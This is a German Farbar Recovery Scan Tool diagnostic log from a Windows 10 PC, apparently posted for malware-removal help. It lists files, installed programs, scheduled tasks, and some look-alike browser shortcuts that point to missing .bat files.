2017-01-26 18:15 - 2017-01-26 18:15 - 00000000 ____D C:\Program Files (x86)\ElsterFormular Update Service
2017-01-26 18:15 - 2017-01-26 18:15 - 00000000 ____D C:\Program Files (x86)\ElsterFormular
2017-01-26 18:13 - 2017-01-26 18:15 - 67816592 _____ (Landesfinanzdirektion Thüringen) C:\Users\Barbara\Downloads\ElsterFormularPrivat.exe
2017-01-25 13:39 - 2016-12-21 08:08 - 00142848 _____ (Microsoft Corporation) C:\WINDOWS\system32\poqexec.exe
2017-01-25 13:39 - 2016-12-21 05:44 - 00120320 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\poqexec.exe

==================== Ein Monat: Geänderte Dateien und Ordner ========

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Datei/der Ordner verschoben.)

2017-02-13 21:31 - 2016-09-23 02:41 - 02430556 _____ C:\WINDOWS\system32\PerfStringBackup.INI
2017-02-13 21:31 - 2016-07-16 23:51 - 00970572 _____ C:\WINDOWS\system32\perfh007.dat
2017-02-13 21:31 - 2016-07-16 23:51 - 00235454 _____ C:\WINDOWS\system32\perfc007.dat
2017-02-13 21:25 - 2016-09-23 02:40 - 00000000 ____D C:\ProgramData\NVIDIA
2017-02-13 21:24 - 2016-09-23 02:44 - 00000006 ____H C:\WINDOWS\Tasks\SA.DAT
2017-02-13 21:24 - 2016-07-16 07:04 - 00524288 _____ C:\WINDOWS\system32\config\BBI
2017-02-13 20:38 - 2016-11-25 17:30 - 00000000 ____D C:\Program Files (x86)\Mozilla Firefox
2017-02-13 20:38 - 2016-07-30 09:24 - 00000000 ____D C:\Users\Barbara\AppData\Local\CrashDumps
2017-02-13 20:36 - 2016-09-23 02:40 - 00000000 ____D C:\WINDOWS\system32\SleepStudy
2017-02-13 20:13 - 2016-07-16 12:47 - 00000000 ____D C:\WINDOWS\LiveKernelReports
2017-02-13 19:15 - 2016-11-26 12:11 - 00000000 ____D C:\Users\Barbara\AppData\LocalLow\Mozilla
2017-02-13 19:13 - 2017-01-13 18:18 - 00002108 _____ C:\Users\Barbara\Desktop\Finanzplan 2017.lnk
2017-02-13 19:13 - 2016-07-16 12:47 - 00000000 ____D C:\WINDOWS\Performance
2017-02-13 19:12 - 2016-11-16 20:05 - 00002457 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Acrobat Reader DC.lnk
2017-02-13 19:12 - 2016-09-23 02:43 - 00001519 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Windows Media Player.lnk
2017-02-13 19:12 - 2016-09-03 11:33 - 00001301 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Illustrator CS3.lnk
2017-02-13 19:12 - 2016-09-03 11:33 - 00000970 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Stock Photos CS3.lnk
2017-02-13 19:12 - 2016-09-03 11:32 - 00001480 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe ExtendScript Toolkit 2.lnk
2017-02-13 19:12 - 2016-09-03 11:32 - 00000953 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Device Central CS3.lnk
2017-02-13 19:12 - 2016-09-03 11:32 - 00000890 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Bridge CS3.lnk
2017-02-13 19:12 - 2016-07-30 09:48 - 00001886 _____ C:\Users\Barbara\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Spotify.lnk
2017-02-13 19:12 - 2016-07-30 08:18 - 00002429 _____ C:\Users\Barbara\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\OneDrive.lnk
2017-02-13 19:12 - 2016-07-30 08:18 - 00001047 _____ C:\Users\Barbara\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Optionale Features.lnk
2017-02-13 19:12 - 2016-07-16 12:43 - 00002437 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Immersive Control Panel.lnk
2017-02-13 19:12 - 2016-07-16 12:43 - 00002301 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\PrintDialog.lnk
2017-02-13 19:12 - 2016-07-16 12:42 - 00002325 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\MiracastView.lnk
2017-02-12 22:24 - 2016-09-23 02:41 - 00000000 ____D C:\Users\Barbara
2017-02-12 22:15 - 2016-07-30 11:41 - 00000000 ____D C:\Users\Barbara\AppData\Roaming\NVIDIA
2017-02-12 22:13 - 2016-07-30 13:09 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\The Witcher 2
2017-02-12 22:13 - 2016-07-30 09:02 - 00002028 ____N C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Моzillа Firеfох.lnk
2017-02-12 22:12 - 2016-07-30 09:48 - 00000000 ____D C:\Users\Barbara\AppData\Local\Spotify
2017-02-12 20:33 - 2016-07-30 09:47 - 00000000 ____D C:\Users\Barbara\AppData\Roaming\Spotify
2017-02-12 20:33 - 2016-07-16 12:45 - 00000000 ____D C:\WINDOWS\INF
2017-02-11 12:51 - 2016-07-16 12:47 - 00000000 ____D C:\WINDOWS\AppReadiness
2017-02-10 11:44 - 2016-07-16 12:47 - 00000000 ___HD C:\Program Files\WindowsApps
2017-02-09 13:39 - 2016-09-23 02:40 - 00000000 ____D C:\ProgramData\NVIDIA Corporation
2017-02-09 13:39 - 2016-07-30 09:20 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\NVIDIA Corporation
2017-02-09 13:38 - 2016-09-23 02:40 - 00000000 ____D C:\Program Files\NVIDIA Corporation
2017-02-09 13:38 - 2016-09-23 02:40 - 00000000 ____D C:\Program Files (x86)\NVIDIA Corporation
2017-02-09 13:38 - 2016-07-30 09:20 - 00000000 ____D C:\Users\Barbara\AppData\Local\NVIDIA Corporation
2017-02-03 17:19 - 2016-11-13 21:39 - 1291434677 _____ C:\WINDOWS\MEMORY.DMP
2017-02-03 17:19 - 2016-11-13 21:39 - 00000000 ____D C:\WINDOWS\Minidump
2017-02-03 17:19 - 2016-07-30 09:02 - 00000000 ____D C:\Program Files (x86)\Mozilla Maintenance Service
2017-02-03 17:18 - 2016-07-30 10:12 - 00000000 ____D C:\ProgramData\Origin
2017-02-03 17:14 - 2016-07-30 09:57 - 00000000 ____D C:\Program Files (x86)\Steam
2017-02-03 17:13 - 2016-07-30 10:16 - 00000000 ____D C:\Users\Barbara\AppData\Local\Origin
2017-02-03 17:12 - 2016-10-13 07:34 - 00003894 _____ C:\WINDOWS\System32\Tasks\NvProfileUpdaterDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
2017-02-03 17:12 - 2016-10-13 07:34 - 00003884 _____ C:\WINDOWS\System32\Tasks\NvNodeLauncher_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
2017-02-03 17:12 - 2016-10-13 07:34 - 00003866 _____ C:\WINDOWS\System32\Tasks\NvTmRep_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
2017-02-03 17:12 - 2016-10-13 07:34 - 00003858 _____ C:\WINDOWS\System32\Tasks\NvTmMon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
2017-02-03 17:12 - 2016-10-13 07:34 - 00003696 _____ C:\WINDOWS\System32\Tasks\NvTmRepOnLogon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
2017-02-03 17:12 - 2016-10-13 07:34 - 00003654 _____ C:\WINDOWS\System32\Tasks\NvProfileUpdaterOnLogon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
2017-02-03 17:12 - 2016-07-30 09:19 - 00000000 ____D C:\Users\Barbara\AppData\Local\NVIDIA
2017-01-25 13:43 - 2016-07-16 12:36 - 00000000 ____D C:\WINDOWS\CbsTemp
2017-01-21 11:40 - 2016-07-30 08:18 - 00000000 ___RD C:\Users\Barbara\OneDrive
2017-01-20 19:39 - 2016-10-13 07:34 - 01872320 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvspcap64.dll
2017-01-20 19:39 - 2016-10-13 07:34 - 01755072 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvspbridge64.dll
2017-01-20 19:39 - 2016-10-13 07:34 - 01464768 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvspcap.dll
2017-01-20 19:39 - 2016-10-13 07:34 - 01317312 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvspbridge.dll
2017-01-20 19:39 - 2016-10-13 07:34 - 00120256 _____ C:\WINDOWS\system32\NvRtmpStreamer64.dll
2017-01-20 19:39 - 2016-10-13 07:34 - 00046016 _____ (NVIDIA Corporation) C:\WINDOWS\system32\Drivers\nvvad64v.sys

==================== Dateien im Wurzelverzeichnis einiger Verzeichnisse =======

2016-09-02 15:48 - 2016-10-11 12:28 - 0000337 _____ () C:\Users\Barbara\AppData\Roaming\2E7BF6-326E-4870-B5B1-B11758EC2B1D.ini

==================== Bamital & volsnap ======================

(Es ist kein automatischer Fix für Dateien vorhanden, die an der Verifikation gescheitert sind.)

C:\WINDOWS\system32\winlogon.exe => Datei ist digital signiert
C:\WINDOWS\system32\wininit.exe => Datei ist digital signiert
C:\WINDOWS\explorer.exe => Datei ist digital signiert
C:\WINDOWS\SysWOW64\explorer.exe => Datei ist digital signiert
C:\WINDOWS\system32\svchost.exe => Datei ist digital signiert
C:\WINDOWS\SysWOW64\svchost.exe => Datei ist digital signiert
C:\WINDOWS\system32\services.exe => Datei ist digital signiert
C:\WINDOWS\system32\User32.dll => Datei ist digital signiert
C:\WINDOWS\SysWOW64\User32.dll => Datei ist digital signiert
C:\WINDOWS\system32\userinit.exe => Datei ist digital signiert
C:\WINDOWS\SysWOW64\userinit.exe => Datei ist digital signiert
C:\WINDOWS\system32\rpcss.dll => Datei ist digital signiert
C:\WINDOWS\system32\dnsapi.dll => Datei ist digital signiert
C:\WINDOWS\SysWOW64\dnsapi.dll => Datei ist digital signiert
C:\WINDOWS\system32\Drivers\volsnap.sys => Datei ist digital signiert

LastRegBack: 2017-02-09 13:37

==================== Ende von FRST.txt ============================

addition

Code:

ATTFilter

Zusätzliches Untersuchungsergebnis von Farbar Recovery Scan Tool (x64) Version: 12-02-2017
durchgeführt von Barbara (13-02-2017 22:39:56)
Gestartet von C:\Users\Barbara\Desktop\Virenscanner etc
Windows 10 Pro Version 1607 (X64) (2016-09-23 01:45:25)
Start-Modus: Normal
==========================================================


==================== Konten: =============================

Administrator (S-1-5-21-1500252791-3377746768-789393517-500 - Administrator - Disabled)
Barbara (S-1-5-21-1500252791-3377746768-789393517-1000 - Administrator - Enabled) => C:\Users\Barbara
DefaultAccount (S-1-5-21-1500252791-3377746768-789393517-503 - Limited - Disabled)
Gast (S-1-5-21-1500252791-3377746768-789393517-501 - Limited - Disabled)
HomeGroupUser$ (S-1-5-21-1500252791-3377746768-789393517-1002 - Limited - Enabled)

==================== Sicherheits-Center ========================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er entfernt.)

AV: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AV: Malwarebytes (Enabled - Up to date) {23007AD3-69FE-687C-2629-D584AFFAF72B}
AS: Malwarebytes (Enabled - Up to date) {98619B37-4FC4-67F2-1C99-EEF6D47DBD96}
AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}

==================== Installierte Programme ======================

(Nur Adware-Programme mit dem Zusatz "Hidden" können in die Fixlist aufgenommen werden, um sie sichtbar zu machen. Die Adware-Programme sollten manuell deinstalliert werden.)

Adobe Acrobat Reader DC - Deutsch (HKLM-x32\...\{AC76BA86-7AD7-1031-7B44-AC0F074E4100}) (Version: 15.023.20056 - Adobe Systems Incorporated)
Adobe Flash Player 24 NPAPI (HKLM-x32\...\Adobe Flash Player NPAPI) (Version: 24.0.0.186 - Adobe Systems Incorporated)
Adobe Illustrator CS3 (HKLM-x32\...\Adobe_c015d5ef39552390a753ee735d16041) (Version: 13.0 - Adobe Systems Incorporated)
Ansel (Version: 368.81 - NVIDIA Corporation) Hidden
ARCHline 2015 15.0.1.239 (HKLM\...\{526F8F65-6A69-4683-AA88-42BB3321C625}_is1) (Version:  - IT-Concept Software GmbH)
CCleaner (HKLM\...\CCleaner) (Version: 5.22 - Piriform)
ElsterFormular (HKLM-x32\...\ElsterFormular) (Version: 18.0.2.18.20170123 - Landesfinanzdirektion Thüringen)
EPSON Scan (HKLM-x32\...\EPSON Scanner) (Version:  - )
Fliqlo Bildschirmschoner (HKLM-x32\...\Fliqlo) (Version:  - )
Java 8 Update 101 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F32180101F0}) (Version: 8.0.1010.13 - Oracle Corporation)
LibreOffice 5.0.6.3 (HKLM-x32\...\{900D9036-4EDA-45EC-A095-E8AFB25D807A}) (Version: 5.0.6.3 - The Document Foundation)
Malwarebytes Version 3.0.6.1469 (HKLM\...\{35065F43-4BB2-439A-BFF7-0F1014F2E0CD}_is1) (Version: 3.0.6.1469 - Malwarebytes)
Mein CEWE FOTOBUCH (HKLM-x32\...\Mein CEWE FOTOBUCH) (Version: 6.1.5 - CEWE Stiftung u Co. KGaA)
MFCDLL Shared Library - Retail Version (x32 Version: 6.0.8665.0 - Unknown) Hidden
Microsoft ASP.NET MVC 4 Runtime (HKLM-x32\...\{3FE312D5-B862-40CE-8E4E-A6D8ABF62736}) (Version: 4.0.40804.0 - Microsoft Corporation)
Microsoft OneDrive (HKU\S-1-5-21-1500252791-3377746768-789393517-1000\...\OneDriveSetup.exe) (Version: 17.3.6743.1212 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2010  x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.60610 (HKLM-x32\...\{a1909659-0a08-4554-8af1-2175904903a1}) (Version: 11.0.60610.1 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (HKLM-x32\...\{050d4fc8-5d48-4b8f-8972-47c82c46020f}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (HKLM-x32\...\{f65db027-aff3-4070-886a-0d87064aabb1}) (Version: 12.0.30501.0 - Microsoft Corporation)
Mozilla Firefox 51.0.1 (x86 de) (HKLM-x32\...\Mozilla Firefox 51.0.1 (x86 de)) (Version: 51.0.1 - Mozilla)
Mozilla Maintenance Service (HKLM-x32\...\MozillaMaintenanceService) (Version: 51.0.1.6234 - Mozilla)
NVIDIA 3D Vision Controller-Treiber 364.44 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.NVIRUSB) (Version: 364.44 - NVIDIA Corporation)
NVIDIA 3D Vision Treiber 376.53 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.3DVision) (Version: 376.53 - NVIDIA Corporation)
NVIDIA GeForce Experience 3.3.0.95 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.GFExperience) (Version: 3.3.0.95 - NVIDIA Corporation)
NVIDIA Grafiktreiber 376.53 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.Driver) (Version: 376.53 - NVIDIA Corporation)
NVIDIA HD-Audiotreiber 1.3.34.17 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_HDAudio.Driver) (Version: 1.3.34.17 - NVIDIA Corporation)
NVIDIA PhysX-Systemsoftware 9.16.0318 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.PhysX) (Version: 9.16.0318 - NVIDIA Corporation)
NvNodejs (Version: 3.3.0.95 - NVIDIA Corporation) Hidden
NvTelemetry (Version: 2.3.5.0 - NVIDIA Corporation) Hidden
NvvHci (Version: 2.02.0.5 - NVIDIA Corporation) Hidden
Origin (HKLM-x32\...\Origin) (Version: 9.12.1.43352 - Electronic Arts, Inc.)
PDF Settings (x32 Version: 1.0 - Adobe Systems Incorporated) Hidden
Realtek Ethernet Controller Driver (HKLM-x32\...\{8833FFB6-5B0C-4764-81AA-06DFEED9A476}) (Version: 7.87.529.2014 - Realtek)
Revo Uninstaller 2.0.2 (HKLM\...\{A28DBDA2-3CC7-4ADC-8BFE-66D7743C6C97}_is1) (Version: 2.0.2 - VS Revo Group, Ltd.)
Sentinel System Driver Installer 7.5.7 (HKLM-x32\...\{B281C7D1-C088-40E0-86EA-B2D9D7E0810A}) (Version: 7.5.7 - SafeNet, Inc.)
SHIELD Streaming (Version: 7.1.0351 - NVIDIA Corporation) Hidden
SHIELD Wireless Controller Driver (Version: 3.3.0.95 - NVIDIA Corporation) Hidden
SketchUp 2016 (HKLM\...\{6ECFED2E-6329-484A-9B08-14ED7F2D65BE}) (Version: 16.1.1449 - Trimble Navigation Limited)
Spotify (HKU\S-1-5-21-1500252791-3377746768-789393517-1000\...\Spotify) (Version: 1.0.45.186.g3b5036d6 - Spotify AB)
Steam (HKLM-x32\...\Steam) (Version: 2.10.91.91 - Valve Corporation)
The Witcher 2 Enhanced Edition Version 3.0 (HKLM-x32\...\The Witcher 2 Enhanced Edition_is1) (Version: 3.0 - CD Projekt RED)
VC User ATL71 RTL X86 --- (x32 Version: 1.0 - Microsoft Corporation) Hidden
Vulkan Run Time Libraries 1.0.26.0 (HKLM\...\VulkanRT1.0.26.0) (Version: 1.0.26.0 - LunarG, Inc.)
WinRAR 5.31 (64-Bit) (HKLM\...\WinRAR archiver) (Version: 5.31.0 - win.rar GmbH)

==================== Benutzerdefinierte CLSID (Nicht auf der Ausnahmeliste): ==========================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)


==================== Geplante Aufgaben (Nicht auf der Ausnahmeliste) =============

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

Task: {07D50CCA-2188-43A1-897B-EF2C5815E13F} - System32\Tasks\CCleanerSkipUAC => C:\Program Files\CCleaner\CCleaner.exe [2016-08-26] (Piriform Ltd)
Task: {08BC7C06-525E-43F2-B72E-DDCD9E7C4DD6} - System32\Tasks\Microsoft\Windows\Media Center\RecordingRestart => %SystemRoot%\ehome\ehrec.exe 
Task: {1A3181DF-833E-436D-A30C-248F034B8623} - System32\Tasks\NvTmRep_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvTmRep.exe [2017-01-20] (NVIDIA Corporation)
Task: {1EA42CBF-EADD-4B00-81ED-2C40E4238B7C} - System32\Tasks\NvTmMon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvTmMon.exe [2017-01-20] (NVIDIA Corporation)
Task: {3024B4B3-FD37-477F-BA7A-04E9D557A0DF} - System32\Tasks\Microsoft\Windows\Media Center\SqlLiteRecoveryTask => %SystemRoot%\ehome\mcupdate.exe 
Task: {358E9F01-B54F-4F1A-A590-566825F4CCF6} - System32\Tasks\Microsoft\Windows\Media Center\PBDADiscovery => %SystemRoot%\ehome\ehPrivJob.exe 
Task: {3782FA31-E821-4B7B-9FD3-1FC42377DBD5} - System32\Tasks\Microsoft\Windows\Media Center\InstallPlayReady => %SystemRoot%\ehome\ehPrivJob.exe 
Task: {3A539CDD-D9FE-4485-BB5E-F119374C2E2B} - System32\Tasks\NvProfileUpdaterDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\Update Core\NvProfileUpdater64.exe [2017-01-20] (NVIDIA Corporation)
Task: {3B7398CA-6B98-47E4-BFFB-FB8AEB3C62F8} - System32\Tasks\Microsoft\Windows\Media Center\DispatchRecoveryTasks => %SystemRoot%\ehome\ehPrivJob.exe 
Task: {535076EF-9CD5-46BA-A7C8-10EEDDA703A2} - System32\Tasks\NvProfileUpdaterOnLogon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\Update Core\NvProfileUpdater64.exe [2017-01-20] (NVIDIA Corporation)
Task: {595ED7A0-ED76-4B70-9B39-AA80B04DC0D1} - System32\Tasks\Microsoft\Windows\Media Center\RegisterSearch => %SystemRoot%\ehome\ehPrivJob.exe 
Task: {60FA74FF-6279-4ECD-9EA9-5DE73A58257E} - System32\Tasks\Microsoft\Windows\Media Center\mcupdate_scheduled => %SystemRoot%\ehome\mcupdate.exe 
Task: {71C58D38-8A13-46DD-8D3E-D7EDF04F9F41} - System32\Tasks\Microsoft\Windows\Media Center\PBDADiscoveryW1 => %SystemRoot%\ehome\ehPrivJob.exe 
Task: {74E7882B-EC43-4B32-87E6-E11EFB4D4BAA} - System32\Tasks\Microsoft\Windows\Media Center\OCURDiscovery => %SystemRoot%\ehome\ehPrivJob.exe 
Task: {82C50AED-8035-414F-9332-DE47AED14F1A} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [2016-12-19] (Adobe Systems Incorporated)
Task: {8621A79A-23F3-402E-B829-1B3C08FC23C6} - System32\Tasks\Microsoft\Windows\Media Center\ActivateWindowsSearch => %SystemRoot%\ehome\ehPrivJob.exe 
Task: {917F73AC-B595-428F-9D7E-804DD4CA0B19} - System32\Tasks\OneDrive Standalone Update Task => C:\Users\Barbara\AppData\Local\Microsoft\OneDrive\17.3.6517.0809\OneDriveStandaloneUpdater.exe 
Task: {931E12E2-BA73-4859-AF12-777A31166AB5} - System32\Tasks\NvNodeLauncher_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\NvNode\nvnodejslauncher.exe [2017-01-20] (NVIDIA Corporation)
Task: {981171F7-EB47-47C7-9E26-7F1DE33B4C5E} - System32\Tasks\Microsoft\Windows\Media Center\UpdateRecordPath => %SystemRoot%\ehome\ehPrivJob.exe 
Task: {9AF8C6A8-27BD-459C-A0B6-149FCF640506} - System32\Tasks\NvDriverUpdateCheckDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe [2017-01-20] (NVIDIA Corporation)
Task: {A23D98E2-25C7-4A4E-A93A-5277AAE5D6BD} - System32\Tasks\Microsoft\Windows\Media Center\PvrScheduleTask => %SystemRoot%\ehome\mcupdate.exe 
Task: {A9DC2516-E3BE-4B34-AE6A-49DECD192D48} - System32\Tasks\Microsoft\Windows\Media Center\OCURActivate => %SystemRoot%\ehome\ehPrivJob.exe 
Task: {ABD44F90-CD20-4C95-AA96-464B6AEE71FE} - System32\Tasks\Microsoft\Windows\Media Center\ReindexSearchRoot => %SystemRoot%\ehome\ehPrivJob.exe 
Task: {AED5C637-95A0-4DD0-ADC7-A4808E2FACE9} - System32\Tasks\Microsoft\Windows\Media Center\PeriodicScanRetry => %windir%\ehome\MCUpdate.exe 
Task: {B3737810-7B5B-49FA-ABF7-D2566CB7161D} - System32\Tasks\Microsoft\Windows\Media Center\PBDADiscoveryW2 => %SystemRoot%\ehome\ehPrivJob.exe 
Task: {B73E6B94-97F6-4185-B265-5AF584ADD7C2} - System32\Tasks\Microsoft\Windows\Media Center\ObjectStoreRecoveryTask => %SystemRoot%\ehome\mcupdate.exe 
Task: {B8A37631-3077-4955-BA7D-5E165F4C4DB5} - System32\Tasks\Microsoft\Windows\Media Center\ehDRMInit => %SystemRoot%\ehome\ehPrivJob.exe 
Task: {C0F5AE71-6716-4F6C-ADC4-059DF01B35BA} - System32\Tasks\Microsoft\Windows\Media Center\StartRecording => %SystemRoot%\ehome\ehrec.exe 
Task: {C1B4B136-C33D-4401-AED3-81D2C9151669} - System32\Tasks\Microsoft\Windows\Media Center\PvrRecoveryTask => %SystemRoot%\ehome\mcupdate.exe 
Task: {CF59DDC9-64FA-4592-BA4C-996DE144E956} - System32\Tasks\NvTmRepOnLogon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvTmRep.exe [2017-01-20] (NVIDIA Corporation)
Task: {D15D9A6F-7B7C-46FF-B72E-989CE158ACF1} - System32\Tasks\Microsoft\Windows\Media Center\MediaCenterRecoveryTask => %SystemRoot%\ehome\mcupdate.exe 
Task: {D20E72EA-E1B2-4FCA-90F2-94F73460A59C} - System32\Tasks\Microsoft\Windows\Media Center\mcupdate => %SystemRoot%\ehome\mcupdate.exe 
Task: {EF1F752D-CA59-470C-BB1B-D66C885E54E5} - System32\Tasks\Microsoft\Windows\Media Center\ConfigureInternetTimeService => %SystemRoot%\ehome\ehPrivJob.exe 

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Aufgabe verschoben. Die Datei, die durch die Aufgabe gestartet wird, wird nicht verschoben.)


==================== Verknüpfungen =============================

(Die Einträge können gelistet werden, um sie zurückzusetzen oder zu entfernen.)

Shortcut: C:\Users\Barbara\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Intеrnеt Ехplоrеr.lnk -> C:\Program Files (x86)\Internet Explorer\iexplore.bat (Keine Datei)
Shortcut: C:\Users\Barbara\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Lаunсh Intеrnеt Ехplоrеr Вrоwsеr.lnk -> C:\Program Files (x86)\Internet Explorer\iexplore.bat (Keine Datei)
Shortcut: C:\Users\Barbara\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Моzillа Firеfох.lnk -> C:\Program Files (x86)\Mozilla Firefox\firefox.bat (Keine Datei)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Моzillа Firеfох.lnk -> C:\Program Files (x86)\Mozilla Firefox\firefox.bat (Keine Datei)

==================== Geladene Module (Nicht auf der Ausnahmeliste) ==============

2016-07-16 12:42 - 2016-07-16 12:42 - 00231424 _____ () C:\WINDOWS\SYSTEM32\ism32k.dll
2016-12-16 16:18 - 2016-12-09 11:29 - 02681200 _____ () C:\WINDOWS\system32\CoreUIComponents.dll
2016-09-23 02:40 - 2016-12-29 13:44 - 00134712 _____ () C:\Program Files\NVIDIA Corporation\Display\NvSmartMax64.dll
2016-09-23 02:40 - 2013-07-04 02:32 - 00936728 _____ () C:\Program Files (x86)\ASUS\AXSP\1.01.02\atkexComSvc.exe
2016-10-13 07:34 - 2017-01-20 19:39 - 04489152 _____ () C:\Program Files\NVIDIA Corporation\NvContainer\Poco.dll
2016-10-13 07:34 - 2017-01-20 19:39 - 01147328 _____ () C:\Program Files\NVIDIA Corporation\NvContainer\libprotobuf.dll
2017-02-13 20:42 - 2017-01-20 07:47 - 02264352 _____ () C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\PoliciesControllerImpl.dll
2017-02-13 20:42 - 2017-01-20 07:47 - 02829776 _____ () C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\arwlib.dll
2017-02-13 20:42 - 2017-01-20 07:47 - 02254800 _____ () C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\MwacLib.dll
2016-12-16 16:18 - 2016-12-09 11:29 - 02681200 _____ () C:\WINDOWS\SYSTEM32\CoreUIComponents.dll
2016-09-23 03:38 - 2016-09-23 03:38 - 00134656 _____ () C:\Windows\ShellExperiences\Windows.UI.Shell.SharedUtilities.dll
2017-01-10 21:04 - 2016-12-21 08:09 - 00474112 _____ () C:\Windows\ShellExperiences\QuickActions.dll
2017-01-10 20:59 - 2016-12-21 07:54 - 09760768 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\CortanaApi.dll
2017-01-10 20:59 - 2016-12-21 07:48 - 01401856 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.Core.dll
2017-01-10 20:59 - 2016-12-21 07:48 - 00757248 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\CSGSuggestLib.dll
2017-01-10 20:59 - 2016-12-21 07:48 - 01033216 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.Actions.dll
2017-01-10 20:59 - 2016-12-21 07:48 - 02424320 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.BackgroundTask.dll
2017-01-10 20:59 - 2016-12-21 07:53 - 04853760 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\RemindersUI.dll
2016-08-26 19:25 - 2016-08-26 19:25 - 00061440 _____ () C:\Program Files\CCleaner\lang\lang-1031.dll
2017-02-10 11:43 - 2017-02-10 11:44 - 13170368 _____ () C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7903.40527.0_x64__8wekyb3d8bbwe\Office.UI.Xaml.Core.dll
2017-01-25 11:40 - 2017-01-25 11:40 - 03865600 _____ () C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1701.10102.0_x64__8wekyb3d8bbwe\Calculator.exe
